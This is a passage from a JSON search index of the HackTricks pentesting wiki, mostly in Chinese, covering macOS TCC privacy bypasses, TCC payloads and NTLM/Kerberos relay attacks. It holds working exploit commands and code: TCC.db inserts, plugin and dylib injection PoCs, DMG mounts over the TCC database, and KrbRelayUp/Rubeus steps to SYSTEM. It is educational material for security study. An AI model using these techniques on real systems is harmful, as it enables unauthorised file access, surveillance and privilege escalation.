com.apple.tccd\\n# print out contents of TCC database and then give Terminal access to Documents\\n$> sqlite3 TCC.db .dump\\n$> sqlite3 TCC.db \\"INSERT INTO access\\nVALUES(\'kTCCServiceSystemPolicyDocumentsFolder\',\\n\'com.apple.Terminal\', 0, 1, 1,\\nX\'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003\',\\nNULL,\\nNULL,\\n\'UNUSED\',\\nNULL,\\nNULL,\\n1333333333333337);\\"\\n# list Documents directory without prompting the end user\\n$> ls ~/Documents","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020–9934 - TCC","id":"2678","title":"CVE-2020–9934 - TCC"},"2679":{"body":"Notes 可以访问 TCC 保护的位置,但当创建一个笔记时,它是 在一个非保护的位置创建的 。因此,您可以要求 Notes 将一个受保护的文件复制到一个笔记中(即在一个非保护的位置),然后访问该文件:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-30761 - 备注","id":"2679","title":"CVE-2021-30761 - 备注"},"268":{"body":"MultiRelay 从 /usr/share/responder/tools 目录执行,针对特定 IP 或用户。 bash python MultiRelay.py -t -u ALL # Relay all users\\npython MultiRelay.py -t -u ALL -c whoami # Execute command\\npython MultiRelay.py -t -u ALL -d # Dump hashes # Proxychains for routing traffic 这些工具和技术形成了一套全面的工具,用于在各种网络环境中进行 NTLM 中继攻击。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » MultiRelay 操作","id":"268","title":"MultiRelay 操作"},"2680":{"body":"二进制文件 /usr/libexec/lsd 与库 libsecurity_translocate 具有特权 com.apple.private.nullfs_allow,这允许它创建 nullfs 挂载,并且具有特权 com.apple.private.tcc.allow,以 kTCCServiceSystemPolicyAllFiles 访问每个文件。 可以将隔离属性添加到 \\"Library\\",调用 com.apple.security.translocation XPC 服务,然后它会将 Library 映射到 $TMPDIR/AppTranslocation/d/d/Library ,其中 Library 内的所有文档都可以 访问 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-30782 - 迁移","id":"2680","title":"CVE-2021-30782 - 迁移"},"2681":{"body":"Music 有一个有趣的功能:当它运行时,它会 导入 被拖放到 ~/Music/Music/Media.localized/Automatically Add to Music.localized 的文件到用户的 \\"媒体库\\"。此外,它调用类似于: rename(a, b); 的内容,其中 a 和 b 是: a = \\"~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3\\" b = \\"~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3 这个 rename(a, b); 行为容易受到 竞争条件 的影响,因为可以在 Automatically Add to Music.localized 文件夹中放置一个假的 TCC.db 文件,然后在创建新文件夹(b)以复制文件时,删除它,并指向 ~/Library/Application Support/com.apple.TCC 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2023-38571 - 音乐与电视","id":"2681","title":"CVE-2023-38571 - 音乐与电视"},"2682":{"body":"如果 SQLITE_SQLLOG_DIR=\\"path/folder\\" ,基本上意味着 任何打开的数据库都会被复制到该路径 。在这个 CVE 中,这个控制被滥用以 写入 一个 SQLite 数据库 ,该数据库将被 一个具有 FDA 的进程打开 TCC 数据库 ,然后滥用 SQLITE_SQLLOG_DIR ,在文件名中使用 符号链接 ,因此当该数据库被 打开 时,用户的 TCC.db 被打开的数据库覆盖 。 更多信息 在写作中 和 在演讲中 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » SQLITE_SQLLOG_DIR - CVE-2023-32422","id":"2682","title":"SQLITE_SQLLOG_DIR - CVE-2023-32422"},"2683":{"body":"如果环境变量 SQLITE_AUTO_TRACE 被设置,库 libsqlite3.dylib 将开始 记录 所有 SQL 查询。许多应用程序使用这个库,因此可以记录它们所有的 SQLite 查询。 多个 Apple 应用程序使用这个库来访问 TCC 保护的信息。 bash # Set this env variable everywhere\\nlaunchctl setenv SQLITE_AUTO_TRACE 1","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » SQLITE_AUTO_TRACE","id":"2683","title":"SQLITE_AUTO_TRACE"},"2684":{"body":"这个 env 变量被 Metal 框架使用 ,这是多个程序的依赖,最显著的是 Music,它具有 FDA。 设置以下内容:MTL_DUMP_PIPELINES_TO_JSON_FILE=\\"path/name\\"。如果 path 是有效目录,漏洞将被触发,我们可以使用 fs_usage 查看程序中发生的事情: 一个文件将被 open(),名为 path/.dat.nosyncXXXX.XXXXXX(X 是随机的) 一个或多个 write() 将内容写入文件(我们无法控制这一点) path/.dat.nosyncXXXX.XXXXXX 将被 renamed() 为 path/name 这是一个临时文件写入,随后是一个 rename(old, new) 这并不安全。 这并不安全,因为它必须 分别解析旧路径和新路径 ,这可能需要一些时间,并且可能容易受到竞争条件的影响。有关更多信息,您可以查看 xnu 函数 renameat_internal()。 caution 所以,基本上,如果一个特权进程正在从您控制的文件夹重命名,您可能会获得 RCE 并使其访问不同的文件,或者像在这个 CVE 中那样,打开特权应用程序创建的文件并存储一个 FD。 如果重命名访问一个您控制的文件夹,同时您已修改源文件或拥有其 FD,您可以将目标文件(或文件夹)更改为指向一个符号链接,这样您就可以随时写入。 这是 CVE 中的攻击:例如,要覆盖用户的 TCC.db,我们可以: 创建 /Users/hacker/ourlink 指向 /Users/hacker/Library/Application Support/com.apple.TCC/ 创建目录 /Users/hacker/tmp/ 设置 MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db 通过运行带有此 env 变量的 Music 来触发漏洞 捕获 /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX 的 open()(X 是随机的) 在这里我们也 open() 这个文件以进行写入,并保持文件描述符 原子性地在 /Users/hacker/tmp 和 /Users/hacker/ourlink 之间切换 在一个循环中 我们这样做是为了最大化成功的机会,因为竞争窗口相当小,但输掉比赛的代价微乎其微 等待一会儿 测试我们是否幸运 如果没有,从头再来 更多信息请查看 https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html caution 现在,如果您尝试使用 env 变量 MTL_DUMP_PIPELINES_TO_JSON_FILE,应用程序将无法启动","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407","id":"2684","title":"MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407"},"2685":{"body":"作为 root,您可以启用此服务, ARD 代理将具有完全的磁盘访问权限 ,这可能会被用户滥用以使其复制新的 TCC 用户数据库 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » Apple Remote Desktop","id":"2685","title":"Apple Remote Desktop"},"2686":{"body":"TCC 在用户的 HOME 文件夹中使用数据库来控制特定于用户的资源访问,路径为 $HOME/Library/Application Support/com.apple.TCC/TCC.db 。 因此,如果用户设法使用指向 不同文件夹 的 $HOME env 变量重新启动 TCC,用户可以在 /Library/Application Support/com.apple.TCC/TCC.db 中创建一个新的 TCC 数据库,并欺骗 TCC 授予任何应用程序任何 TCC 权限。 tip 请注意,Apple 使用存储在用户配置文件中的 NFSHomeDirectory 属性的设置作为 $HOME 的值,因此如果您妥协了一个有权限修改此值的应用程序( kTCCServiceSystemPolicySysAdminFiles ),您可以 武器化 此选项以绕过 TCC。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过 NFSHomeDirectory","id":"2686","title":"通过 NFSHomeDirectory"},"2687":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020–9934 - TCC","id":"2687","title":"CVE-2020–9934 - TCC"},"2688":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-27937 - Directory Utility","id":"2688","title":"CVE-2020-27937 - Directory Utility"},"2689":{"body":"第一个 POC 使用 dsexport 和 dsimport 来修改用户的 HOME 文件夹。 获取目标应用程序的 csreq blob。 植入一个带有所需访问权限和 csreq blob 的假 TCC.db 文件。 使用 dsexport 导出用户的目录服务条目。 修改目录服务条目以更改用户的主目录。 使用 dsimport 导入修改后的目录服务条目。 停止用户的 tccd 并重启该进程。 第二个 POC 使用 /usr/libexec/configd ,它具有 com.apple.private.tcc.allow,值为 kTCCServiceSystemPolicySysAdminFiles。 可以使用 -t 选项运行 configd ,攻击者可以指定 自定义 Bundle 进行加载 。因此,该漏洞 替换 了 dsexport 和 dsimport 更改用户主目录的方法,使用 configd 代码注入 。 有关更多信息,请查看 原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-30970 - Powerdir","id":"2689","title":"CVE-2021-30970 - Powerdir"},"269":{"body":"在 Windows 中,您 可能能够强制某些特权账户对任意机器进行身份验证 。请阅读以下页面以了解如何: Force NTLM Privileged Authentication","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 强制 NTLM 登录","id":"269","title":"强制 NTLM 登录"},"2690":{"body":"有不同的技术可以在进程内部注入代码并滥用其 TCC 权限: macOS Process Abuse 此外,发现的最常见的通过 TCC 的进程注入是通过 插件(加载库) 。 插件是通常以库或 plist 形式存在的额外代码,将由 主应用程序加载 ,并将在其上下文中执行。因此,如果主应用程序有权访问 TCC 限制的文件(通过授予的权限或特权), 自定义代码也将拥有这些权限 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过进程注入","id":"2690","title":"通过进程注入"},"2691":{"body":"应用程序 /System/Library/CoreServices/Applications/Directory Utility.app 具有特权 kTCCServiceSystemPolicySysAdminFiles ,加载了扩展名为 .daplug 的插件,并且 没有经过强化 的运行时。 为了武器化此 CVE, NFSHomeDirectory 被 更改 (滥用之前的特权),以便能够 接管用户的 TCC 数据库 以绕过 TCC。 有关更多信息,请查看 原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-27937 - Directory Utility","id":"2691","title":"CVE-2020-27937 - Directory Utility"},"2692":{"body":"二进制文件 /usr/sbin/coreaudiod 具有特权 com.apple.security.cs.disable-library-validation 和 com.apple.private.tcc.manager。第一个 允许代码注入 ,第二个则赋予其 管理 TCC 的权限。 该二进制文件允许从文件夹 /Library/Audio/Plug-Ins/HAL 加载 第三方插件 。因此,可以使用此 PoC 加载插件并滥用 TCC 权限 : objectivec #import \\n#import extern void TCCAccessSetForBundleIdAndCodeRequirement(CFStringRef TCCAccessCheckType, CFStringRef bundleID, CFDataRef requirement, CFBooleanRef giveAccess); void add_tcc_entry() {\\nCFStringRef TCCAccessCheckType = CFSTR(\\"kTCCServiceSystemPolicyAllFiles\\"); CFStringRef bundleID = CFSTR(\\"com.apple.Terminal\\");\\nCFStringRef pureReq = CFSTR(\\"identifier \\\\\\"com.apple.Terminal\\\\\\" and anchor apple\\");\\nSecRequirementRef requirement = NULL;\\nSecRequirementCreateWithString(pureReq, kSecCSDefaultFlags, &requirement);\\nCFDataRef requirementData = NULL;\\nSecRequirementCopyData(requirement, kSecCSDefaultFlags, &requirementData); TCCAccessSetForBundleIdAndCodeRequirement(TCCAccessCheckType, bundleID, requirementData, kCFBooleanTrue);\\n} __attribute__((constructor)) static void constructor(int argc, const char **argv) { add_tcc_entry(); NSLog(@\\"[+] Exploitation finished...\\");\\nexit(0); 有关更多信息,请查看 原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-29621 - Coreaudiod","id":"2692","title":"CVE-2020-29621 - Coreaudiod"},"2693":{"body":"通过 Core Media I/O 打开摄像头流的系统应用程序(具有 kTCCServiceCamera 的应用程序)会加载位于 /Library/CoreMediaIO/Plug-Ins/DAL 的 这些插件 (不受 SIP 限制)。 只需在此处存储一个带有常见 构造函数 的库即可 注入代码 。 多个 Apple 应用程序对此存在漏洞。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 设备抽象层 (DAL) 插件","id":"2693","title":"设备抽象层 (DAL) 插件"},"2694":{"body":"Firefox 应用程序具有 com.apple.security.cs.disable-library-validation 和 com.apple.security.cs.allow-dyld-environment-variables 权限: xml codesign -d --entitlements :- /Applications/Firefox.app\\nExecutable=/Applications/Firefox.app/Contents/MacOS/firefox \\n\\n\\n\\ncom.apple.security.cs.allow-unsigned-executable-memory\\n\\ncom.apple.security.cs.disable-library-validation\\n\\ncom.apple.security.cs.allow-dyld-environment-variables\\n\\ncom.apple.security.device.audio-input\\n\\ncom.apple.security.device.camera\\n\\ncom.apple.security.personal-information.location\\n\\ncom.apple.security.smartcard\\n\\n\\n 有关如何轻松利用此漏洞的更多信息,请 查看原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » Firefox","id":"2694","title":"Firefox"},"2695":{"body":"二进制文件/system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl具有权限**com.apple.private.tcc.allow 和 com.apple.security.get-task-allow**,这允许在进程内部注入代码并使用TCC权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-10006","id":"2695","title":"CVE-2020-10006"},"2696":{"body":"Telegram具有权限**com.apple.security.cs.allow-dyld-environment-variables 和 com.apple.security.cs.disable-library-validation ,因此可以利用它 获取其权限**,例如使用相机录制。您可以 在报告中找到有效载荷 。 注意如何使用环境变量加载库, 创建了一个自定义plist 来注入此库,并使用**launchctl**来启动它: xml \\n\\n\\n\\nLabel\\ncom.telegram.launcher\\nRunAtLoad\\n\\nEnvironmentVariables\\n\\nDYLD_INSERT_LIBRARIES\\n/tmp/telegram.dylib\\n\\nProgramArguments\\n\\n/Applications/Telegram.app/Contents/MacOS/Telegram\\n\\nStandardOutPath\\n/tmp/telegram.log\\nStandardErrorPath\\n/tmp/telegram.log\\n\\n bash launchctl load com.telegram.launcher.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2023-26818 - Telegram","id":"2696","title":"CVE-2023-26818 - Telegram"},"2697":{"body":"即使在沙盒中也可以调用 open","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过开放调用","id":"2697","title":"通过开放调用"},"2698":{"body":"在技术人员使用的计算机上,给终端 完全磁盘访问 (FDA) 是很常见的。并且可以使用它调用 .terminal 脚本。 .terminal 脚本是 plist 文件,例如这个文件,其中包含在 CommandString 键中执行的命令: xml \\n \\n\\nCommandString\\ncp ~/Desktop/private.txt /tmp/;\\nProfileCurrentVersion\\n2.0600000000000001\\nRunCommandAsShell\\n\\nname\\nexploit\\ntype\\nWindow Settings\\n\\n 一个应用程序可以在 /tmp 等位置写入一个终端脚本,并使用以下命令启动它: objectivec // Write plist in /tmp/tcc.terminal\\n[...]\\nNSTask *task = [[NSTask alloc] init];\\nNSString * exploit_location = @\\"/tmp/tcc.terminal\\";\\ntask.launchPath = @\\"/usr/bin/open\\";\\ntask.arguments = @[@\\"-a\\", @\\"/System/Applications/Utilities/Terminal.app\\",\\nexploit_location]; task.standardOutput = pipe;\\n[task launch];","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 终端脚本","id":"2698","title":"终端脚本"},"2699":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过挂载","id":"2699","title":"通过挂载"},"27":{"body":"根据 你进行的 测试 是 内部测试还是外部测试 ,你可能会对查找 公司网络中的主机 (内部测试)或 在互联网上查找公司的资产 (外部测试)感兴趣。 note 请注意,如果你正在进行外部测试,一旦你成功获得公司内部网络的访问权限,你应该重新开始本指南。","breadcrumbs":"Pentesting Methodology » 1- 发现网络中的主机 / 发现公司的资产","id":"27","title":"1- 发现网络中的主机 / 发现公司的资产"},"270":{"body":"Kerberos 中继攻击 从一个服务窃取 AP-REQ 票证 ,并将其重新用于共享 相同计算机账户密钥 的第二个服务(因为两个 SPN 位于同一 $ 机器账户上)。即使 SPN 的 服务类别不同 (例如 CIFS/ → LDAP/),这也有效,因为解密票证的 密钥 是机器的 NT 哈希,而不是 SPN 字符串本身,SPN 字符串不是签名的一部分。 与 NTLM 中继不同,跳转仅限于 同一主机 ,但是,如果您针对允许您写入 LDAP 的协议,您可以链入 基于资源的受限委派 (RBCD) 或 AD CS 注册 ,并在一次操作中获取 NT AUTHORITY\\\\SYSTEM 。 有关此攻击的详细信息,请查看: https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/ Kerberos 基础知识 令牌 目的 中继相关性 TGT / AS-REQ ↔ REP 向 KDC 证明用户 未触及 服务票证 / TGS-REQ ↔ REP 绑定到一个 SPN ;使用 SPN 拥有者的密钥加密 如果 SPN 共享账户则可互换 AP-REQ 客户端将 TGS 发送到服务 我们窃取和重放的内容 票证使用 拥有 SPN 的账户的密码派生密钥 加密。 AP-REQ 内的 Authenticator 有一个 5 分钟的时间戳;在该窗口内重放有效,直到服务缓存看到重复。 Windows 很少检查票证中的 SPN 字符串是否与您访问的服务匹配,因此 CIFS/HOST 的票证通常可以在 LDAP/HOST 上正常解密。 中继 Kerberos 必须满足的条件 共享密钥: 源和目标 SPN 属于同一计算机账户(Windows 服务器上的默认设置)。 无通道保护: SMB/LDAP 签名关闭,HTTP/LDAPS 的 EPA 关闭。 您可以拦截或强制身份验证: LLMNR/NBNS 中毒,DNS 欺骗, PetitPotam / DFSCoerce RPC ,伪造 AuthIP,恶意 DCOM 等。 票证来源未被使用: 您在真实数据包到达之前赢得比赛或完全阻止它;否则服务器的重放缓存会触发事件 4649。 您需要以某种方式能够在通信中执行 MitM ,可能是 DNSAmins 组的一部分,以修改域的 DNS 或能够更改受害者的 HOST 文件。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Kerberos 中继攻击","id":"270","title":"Kerberos 中继攻击"},"2700":{"body":"任何用户 (甚至是无特权用户)都可以创建并挂载时间机器快照,并 访问该快照的所有文件 。 所需的 唯一特权 是用于访问的应用程序(如 Terminal)需要具有 完全磁盘访问 (FDA)权限(kTCCServiceSystemPolicyAllfiles),该权限需要由管理员授予。 bash # Create snapshot\\ntmutil localsnapshot # List snapshots\\ntmutil listlocalsnapshots /\\nSnapshots for disk /:\\ncom.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it\\ncd /tmp # I didn it from this folder\\nmkdir /tmp/snap # Mount it, \\"noowners\\" will mount the folder so the current user can access everything\\n/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it\\nls /tmp/snap/Users/admin_user # This will work 更详细的解释可以在 原始报告中找到 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-9771 - mount_apfs TCC 绕过和权限提升","id":"2700","title":"CVE-2020-9771 - mount_apfs TCC 绕过和权限提升"},"2701":{"body":"即使TCC数据库文件受到保护,仍然可以 在目录上挂载 一个新的TCC.db文件: bash # CVE-2021-1784\\n## Mount over Library/Application\\\\ Support/com.apple.TCC\\nhdiutil attach -owners off -mountpoint Library/Application\\\\ Support/com.apple.TCC test.dmg # CVE-2021-1784\\n## Mount over ~/Library\\nhdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg python # This was the python function to create the dmg\\ndef create_dmg():\\nos.system(\\"hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \\\\\\"tccbypass\\\\\\" -fs APFS 1>/dev/null\\")\\nos.system(\\"mkdir /tmp/mnt\\")\\nos.system(\\"hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null\\")\\nos.system(\\"mkdir -p /tmp/mnt/Application\\\\ Support/com.apple.TCC/\\")\\nos.system(\\"cp /tmp/TCC.db /tmp/mnt/Application\\\\ Support/com.apple.TCC/TCC.db\\")\\nos.system(\\"hdiutil detach /tmp/mnt 1>/dev/null\\") 检查 完整的利用 在 原始写作 中。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-1784 & CVE-2021-30808 - 在TCC文件上挂载","id":"2701","title":"CVE-2021-1784 & CVE-2021-30808 - 在TCC文件上挂载"},"2702":{"body":"正如在 原始写作 中所解释的,这个CVE利用了diskarbitrationd。 公共DiskArbitration框架中的函数DADiskMountWithArgumentsCommon执行了安全检查。然而,可以通过直接调用diskarbitrationd来绕过它,因此可以在路径中使用../元素和符号链接。 这使得攻击者能够在任何位置进行任意挂载,包括由于diskarbitrationd的com.apple.private.security.storage-exempt.heritable权限而覆盖TCC数据库。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2024-40855","id":"2702","title":"CVE-2024-40855"},"2703":{"body":"工具**/usr/sbin/asr**允许复制整个磁盘并将其挂载到另一个位置,从而绕过TCC保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » asr","id":"2703","title":"asr"},"2704":{"body":"在**/var/db/locationd/clients.plist 中有一个第三个TCC数据库,用于指示允许 访问位置服务 的客户端。 文件夹 /var/db/locationd/没有受到DMG挂载的保护**,因此可以挂载我们自己的plist。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 位置服务","id":"2704","title":"位置服务"},"2705":{"body":"macOS Auto Start","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过启动应用程序","id":"2705","title":"通过启动应用程序"},"2706":{"body":"在多个场合,文件会在未受保护的位置存储敏感信息,如电子邮件、电话号码、消息等...(这被视为Apple的一个漏洞)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过grep","id":"2706","title":"通过grep"},"2707":{"body":"这不再有效,但它 在过去有效 : 另一种使用 CoreGraphics事件 的方法:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 合成点击","id":"2707","title":"合成点击"},"2708":{"body":"https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8 https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/ 20+ Ways to Bypass Your macOS Privacy Mechanisms Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 参考","id":"2708","title":"参考"},"2709":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » macOS Apple Scripts » macOS Apple Scripts","id":"2709","title":"macOS Apple Scripts"},"271":{"body":"3.1 侦察主机 powershell # find servers where HTTP, LDAP or CIFS share the same machine account\\nGet-ADComputer -Filter * -Properties servicePrincipalName |\\nWhere-Object {$_.servicePrincipalName -match \'(HTTP|LDAP|CIFS)\'} |\\nSelect Name,servicePrincipalName 3.2 启动中继监听器 KrbRelayUp powershell # one-click local SYSTEM via RBCD\\n.\\\\KrbRelayUp.exe relay --spn \\"ldap/DC01.lab.local\\" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 KrbRelayUp 将 KrbRelay → LDAP → RBCD → Rubeus → SCM 绕过 包装在一个二进制文件中。 3.3 强制 Kerberos 认证 powershell # coerce DC to auth over SMB with DFSCoerce\\n.\\\\dfscoerce.exe --target \\\\\\\\DC01.lab.local --listener 10.0.0.50 DFSCoerce使DC向我们发送Kerberos CIFS/DC01票证。 3.4 中继AP-REQ KrbRelay从SMB中提取GSS blob,将其重新打包为LDAP绑定,并将其转发到ldap://DC01——身份验证成功,因为 相同的密钥 解密了它。 3.5 滥用LDAP ➜ RBCD ➜ SYSTEM powershell # (auto inside KrbRelayUp) manual for clarity\\nNew-MachineAccount -Name \\"FAKE01\\" -Password \\"P@ss123\\"\\nKrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID\\nRubeus s4u /user:FAKE01$ /rc4: /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt\\nSCMUACBypass.exe 您现在拥有 NT AUTHORITY\\\\SYSTEM 。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Kerberos 中继步骤","id":"271","title":"Kerberos 中继步骤"},"2710":{"body":"这是一种用于任务自动化的脚本语言, 与远程进程交互 。它使得 请求其他进程执行某些操作 变得相当简单。 恶意软件 可能会滥用这些功能,以利用其他进程导出的功能。 例如,恶意软件可以 在浏览器打开的页面中注入任意的JS代码 。或者 自动点击 用户请求的某些允许权限; applescript tell window 1 of process \\"SecurityAgent\\"\\nclick button \\"Always Allow\\" of group 1\\nend tell 这里有一些示例: https://github.com/abbeycode/AppleScripts 在这里找到有关恶意软件使用苹果脚本的更多信息 here 。 苹果脚本可以很容易地 \\" 编译 \\"。这些版本可以通过 osadecompile 很容易地 \\" 反编译 \\"。 然而,这些脚本也可以 导出为“只读” (通过“导出...”选项): ```\\nfile mal.scpt\\nmal.scpt: AppleScript compiled\\n```\\n在这种情况下,即使使用 `osadecompile` 也无法反编译内容。 然而,仍然有一些工具可以用来理解这种可执行文件, 阅读此研究以获取更多信息 。工具 applescript-disassembler 和 aevt_decompile 将非常有助于理解脚本的工作原理。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » macOS Apple Scripts » Apple Scripts","id":"2710","title":"Apple Scripts"},"2711":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » macOS TCC Payloads","id":"2711","title":"macOS TCC Payloads"},"2712":{"body":"权限 : 无 TCC : kTCCServiceSystemPolicyDesktopFolder ObjetiveC\\nShell 将 $HOME/Desktop 复制到 /tmp/desktop。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Desktop\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/desktop\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Desktop 复制到 /tmp/desktop。 bash cp -r \\"$HOME/Desktop\\" \\"/tmp/desktop\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 